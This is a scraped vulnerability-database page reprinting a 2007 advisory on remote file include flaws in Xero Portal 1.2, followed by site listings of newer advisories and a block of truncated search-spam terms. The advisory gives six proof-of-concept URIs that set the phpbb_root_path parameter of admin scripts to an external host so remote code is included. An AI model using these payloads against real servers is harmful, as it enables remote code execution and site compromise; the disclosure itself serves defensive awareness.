exploits , vulnerabilities , articles , Digitalxero Xero Portal PHPBB_Root_Path Multiple Remote File Include Vulnerabilities

Title	Digitalxero Xero Portal PHPBB_Root_Path Multiple Remote File Include Vulnerabilities
Published	2007-01-25-12:00AM
Updated	2007-01-25-10:29PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	xoron is credited with the discovery of these vulnerabilities.
Vulnerable	digitalxero Xero Portal 1.2
Not Vulnerable
Code	An attacker can exploit these issues via a web client. The following proof-of-concept URIs are available. http://www.example.com/admin/admin_linkdb.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_forum_prune.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_extensions.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_board.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_attachments.php?phpbb_root_path=http://www,example2.com http://www.example.com/admin/admin_users.php?phpbb_root_path=http://www,example2.com
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 05:14:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.myspac www.184m.c wwwblackpo news for c WWW.SEXGiR exploit 2. phpBB por Free naket 200 /compo t568t aishatakia Free video Pictur pur USR 5462 news for c EUROTC TV youa.baidu r/n21c7/r/ CMS is Fre CsDos www.colegi freebsd 4. tabu trip.lt99. Www.bigboo seesexfilm Text my1988.tao free cd ke hacks /phfito/ph debian 3.0 www.whcku. www .teens Nayanthara Desktop Cewe bugil www.8sina. Www.bigbut xnxx com. nude blond www.shwbw. Video xl o dragonball yuo porm sex india real power ventrilo 2 www.goweb8 www.anima